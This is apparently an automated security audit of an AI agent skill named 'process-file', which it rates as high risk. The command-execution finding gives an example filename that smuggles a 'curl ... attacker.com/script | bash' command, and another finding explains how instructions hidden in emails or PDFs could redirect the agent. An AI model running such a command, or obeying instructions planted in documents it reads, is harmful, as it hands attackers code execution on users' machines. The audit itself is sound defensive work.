process-file
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
- [Privilege Escalation] (HIGH): The skill instructions explicitly direct the agent to prompt the user to execute
sudo apt install maildir-utilsif the tool is missing. Instructing users to run commands with root privileges via an AI agent is a high-risk pattern that can be exploited if the package name or command is tampered with. - [Command Execution] (HIGH): The workflow uses shell commands
mu view <filepath>andmarkitdown <filepath>to process files. There is no evidence of filename sanitization or escaping. A maliciously crafted filename (e.g.,file.eml; curl http://attacker.com/script | bash) could lead to arbitrary command execution on the host system. - [Indirect Prompt Injection] (LOW): The skill processes untrusted external data such as emails (.eml), PDFs, and Office documents.
- Ingestion points: Files provided by the user or identified in the project directory are parsed into text.
- Boundary markers: None. The extracted content is passed directly to the language model for 'Content Analysis' and 'Infer user intent' without delimiters or instructions to ignore embedded commands.
- Capability inventory: The skill can execute shell commands, read/write files via integrated skills, and suggest storage locations.
- Sanitization: None mentioned. Malicious instructions inside an email or PDF could manipulate the agent's behavior during the analysis phase.
- [External Downloads] (MEDIUM): The skill depends on external packages (
maildir-utils,markitdown) and instructs the agent to facilitate their installation. Whilemarkitdownis a known Microsoft tool, the skill does not specify versions or verify integrity, creating a risk of installing compromised versions if the user's environment is misconfigured.
Recommendations
- AI detected serious security threats
Audit Metadata